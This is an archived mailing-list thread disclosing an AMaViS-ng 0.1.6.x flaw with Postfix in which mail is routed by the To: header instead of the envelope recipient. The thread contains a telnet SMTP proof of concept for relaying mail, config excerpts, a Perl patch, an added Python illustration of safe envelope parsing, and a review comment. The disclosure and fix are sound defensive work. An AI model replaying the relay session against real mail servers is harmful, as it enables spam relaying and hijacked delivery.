
View Full Version : AMaViS-ng 0.1.6.x and postfix: possible open relay and mail loss



Phil Cyc
08/04/03, 18:50
Hi everyone -

with postfix using AMaViS-ng 0.1.6.x (tested: 0.1.6.2 and 0.1.6.3; 0.1.4.x is
not vulnerable), all email gets forwarded to the address specified by the
"To:" header line, ignoring the real recipient given via "RCPT TO:".

Possible exploit:
--%snip%--
#> telnet somemx.domain.tld 25
(220 somemx.domain.tld ESMTP Postfix)
helo amavis-ng
(250 somemx.domain.tld)
mail from:userX@domainX.tld
(250 ok)
rcpt to:userY@domain.tld
(250 ok)
data
(354 End data with <CR><LF>.<CR><LF>)
From: userX@domainX.tld
To: userZ@domainZ.tld
Subject: AMaViS-ng 0.1.6.x bug
.
(250 Ok: queued as ...)
quit
(221 Bye)
--%snip%--

Requirements: The mx (somemx.domain.tld) having postfix and AMaViS-ng 0.1.6.x
installed must accept emails for userY@domain.tld.

What it does:
userX@domainX.tld is sending an email to userY@domain.tld. The header of this
email contains "To: userZ@domain.tld". AMaViS-ng seems to parse the header
and forwards the email to userZ@domain.tld. userY@domain.tld does not get
this email.
As many postfix users trust their localhost (no restrictions for localhost),
it is possible to relay an email or a spam mail this way.

configuration files (relevant parts):

# $postfix/master.cf
smtp inet n - n - - smtpd -o content_filter=filter:
filter unix - n n - - pipe
flags=Rq user=mail argv=/usr/bin/amavis ${sender} -- ${recipient}
# end of master.cf

# $amavis-ng/amavis.conf
[global]
mail-transfer-agent = Postfix

[Postfix]
postfix = /usr/sbin/sendmail
args = -i -f
# end of amavis.conf

There is no problem with AMaViS == 0.1.4.x

Kind regards,

Phil Cyc
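The master.cf above hands the filter its envelope as argv (`${sender} -- ${recipient}`), and the safe design is to reinject from that argv only, never from the To: header. The following is an added illustration of that rule, not code from the post or from amavis-ng; the function names, the address pattern and the sample message are constructed here.

```python
import re
import email

# Constructed illustration (not amavis-ng code): derive the reinjection envelope
# only from the argv that master.cf hands to the pipe(8) filter
# ("${sender} -- ${recipient}", optionally preceded by "-f"), never from To:.

# Untaint/validation pattern: a plain local@domain address ("<>" is exempt).
ADDR_RE = re.compile(r'^[A-Za-z0-9._%+=/-]+@[A-Za-z0-9.-]+$')

def parse_filter_argv(argv):
    """Return (sender, recipients) from the pipe(8) argv, mirroring the patched
    amavis-ng logic plus the '--' separator: optional -f, the sender ("<>" if
    empty), optional -d, then one or more envelope recipients."""
    args = list(argv)
    if args and args[0] == "-f":
        args.pop(0)
    if not args:
        raise ValueError("MTA passed no sender argument")
    sender = args.pop(0) or "<>"
    if args and args[0] == "-d":
        args.pop(0)
    if args and args[0] == "--":
        args.pop(0)
    recipients = [a for a in args if a]
    if not recipients:
        raise ValueError("MTA passed no envelope recipients")
    for addr in [sender] + recipients:
        if addr != "<>" and not ADDR_RE.match(addr):
            raise ValueError("refusing malformed address: %r" % addr)
    return sender, recipients

def reinjection_command(argv, sendmail="/usr/sbin/sendmail"):
    """Build the sendmail(1) argv used to hand the scanned message back to
    Postfix. The message body is never consulted, so a forged To: header
    cannot change who receives it."""
    sender, recipients = parse_filter_argv(argv)
    return [sendmail, "-i", "-f", sender, "--"] + recipients

# Constructed message whose To: header differs from the envelope recipient.
SAMPLE = ("From: userX@domainX.tld\r\nTo: userZ@domainZ.tld\r\n"
          "Subject: AMaViS-ng 0.1.6.x bug\r\n\r\ntest body\r\n")

def envelope_vs_header(argv, raw_message):
    """Return (envelope_recipients, header_to) so the two can be compared."""
    _, recipients = parse_filter_argv(argv)
    header_to = email.message_from_string(raw_message)["To"]
    return recipients, header_to
```

Running `envelope_vs_header` on the sample shows the recipient list coming from argv (userY) while the header still says userZ, which is exactly the distinction the buggy versions lost.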

Phil Cyc
10/04/03, 06:50

Hi -

As long as the problem is not fixed by the AMaViS-ng maintainers, this patch
could be helpful.

I took the relevant part from the version 0.1.4.1 source. This patch
(attachment) applies to 0.1.6.3.

Kind regards,

Phil Cyc


diff -Nru amavis-ng-0.1.6.3.orig/AMAVIS/MTA/Postfix.pm amavis-ng-0.1.6.3.postfix/AMAVIS/MTA/Postfix.pm
--- amavis-ng-0.1.6.3.orig/AMAVIS/MTA/Postfix.pm Tue Mar 18 00:04:21 2003
+++ amavis-ng-0.1.6.3.postfix/AMAVIS/MTA/Postfix.pm Tue Apr 8 23:28:09 2003
@@ -112,22 +112,11 @@

writelog($args,LOG_DEBUG, "Called as amavis ".join(' ',@ARGV));

- while (shift @ARGV) {
- /^-f$/ && next; # ignore "-f"
- /^-d$/ && next; # ignore "-d"
- s/^(.*)$/$1/; # untaint sender or recipient
- if (not defined $$args{'sender'}) {
- if (/^$/) {
- $$args{'sender'} = "<>";
- }
- else {
- $$args{'sender'} = $_;
- }
- }
- else {
- push @{$$args{'recipients'}}, $_;
- }
- }
+ shift @ARGV if $ARGV[0] eq "-f";
+ $$args{'sender'} = shift @ARGV;
+ $$args{'sender'} = "<>" if (!$$args{'sender'});
+ shift @ARGV if $ARGV[0] eq "-d";
+ push @{$$args{'recipients'}}, @ARGV;

# Message file has been written, reset file pointer and put it into
# the record.
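Review bot: the replacement drops the untaint step (`s/^(.*)$/$1/;`) without putting anything in its place, so under taint checking the sender and recipient strings handed on to sendmail stay tainted; re-add an untaint, preferably one that validates an address shape rather than matching `(.*)`. Two smaller points in the new lines: `shift @ARGV if $ARGV[0] eq "-f";` warns on an empty @ARGV (guard with `@ARGV &&`), and with master.cf invoking `amavis ${sender} -- ${recipient}` neither the old loop nor the new code strips the `--` separator, so it would be pushed into recipients unless handled elsewhere. For the record, the removed loop's `while (shift @ARGV)` never assigns the shifted value to `$_`, so its `-f`/`-d` checks and the sender/recipient assignments operated on an unrelated `$_`, which would explain why the envelope recipients were never collected.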
